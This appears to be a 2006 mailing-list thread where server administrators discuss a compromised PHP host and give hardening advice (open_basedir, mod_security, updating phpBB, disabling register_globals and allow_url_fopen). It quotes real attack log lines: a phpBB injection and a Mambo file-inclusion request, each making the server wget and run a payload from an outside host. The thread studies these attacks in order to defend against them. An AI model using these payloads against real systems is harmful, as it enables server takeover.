php_admin_value "open_basedir" "/path/to/domain/dir/htdocs:
/path/to/other/include/dirs"
php_admin_value "upload_tmp_dir" "/path/to/domain/dir/htdocs/phpuploadtmpdir"
This will only allow php to open files in those directory only. If you will allow to upload files, then you should change the upload temp path to be inside one of the open_basedir directories.
--
Jose Canciani.
php_admin_value "upload_tmp_dir" "/path/to/domain/dir/htdocs/phpuploadtmpdir"
This will only allow php to open files in those directory only. If you will allow to upload files, then you should change the upload temp path to be inside one of the open_basedir directories.
--
Jose Canciani.
On 2/10/06, Peter Maag <[EMAIL PROTECTED]> wrote:
I would personally setup mod_security as well. It should stop most of these types of attacks right away with default settings.Peter
On 2/10/06, David <[EMAIL PROTECTED] > wrote:Bill Shupp wrote:
> David wrote:
>
>> Thanks Peter - reassuring to know that someone else thinks they probably
>> didn't get root... I have been watching ps and netstat -p and haven't
>> seen anything suspicious, nor seen any more rogue messages in my mail
>> queue... fingers crossed :) I have plans to replace this box ASAP however.
>>
>> I uncovered this in the apache logs:
>>
>> ./www.myvirtualhost.domain-access_log: 86.35.6.242 - -
>> [25/Jul/2005:21:32:12 +0930] "GET /store/phpbb2/viewtopic.php?t=2&rush=%
>> 65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20www.cycomm.info/priv8/bin.tar.gz;tar%20xzvf%20bin.tar.gz;bin/bsh;ls%20-sa%
>>
>> 3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%7
>>
>> 3%68%5D%29.%2527 HTTP/1.1" 200 21138 "-" "Mozilla/4.0 (compatible; MSIE
>> 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
>>
>> looks bad, a phpbb exploit perhaps, but the date is wrong... hoping the
>> system weathered that one. Closer to date is:
>>
>> ./myvirtualhost.domain-error_log:[Sun Jan 15 22:51:53 2006] [error]
>> [client 85.214.20.161] request failed: erroneous characters aft
>> er protocol string: GET
>> /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http:
>>
>> //209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|
>> HTTP\\x01.1
>>
>> But it looks like that one failed. Oh well time to update php and clean
>> out a few old phpbb installs. Thanks all for your help.
>>
>> David
>>
>
>
> A few things I always run into with PHP that are popular:
>
> 1) Make sure PHPBB is the latest version and not exploitable. I used to
> allow my clients to install it, but every few months, SOMEONE would
> install an old exploitable version. I've switched to using debian's
> PHPBB package, and just point clients to it so I don't have to keep
> track of it anymore. I just run security updates daily instead on all
> packages. Haven't been exploited since.
>
> 2) Keep register_globals off, and only turn it on as needed.
>
> 3) Make sure allow_url_fopen is set to OFF. This is a very popular one,
> and in my experience tends to attract DDoS attackes rather than a mail
> exploit. But costs you expensive bandwitdth nonetheless.
>
> Regards,
>
> Bill
>
> !DSPAM:43ecbcde224031625613092!
>
>
Cheers Bill, register_globals always off, but now I will probably
disable url file operations too. Perhaps just enable them on a per-site
setting
David
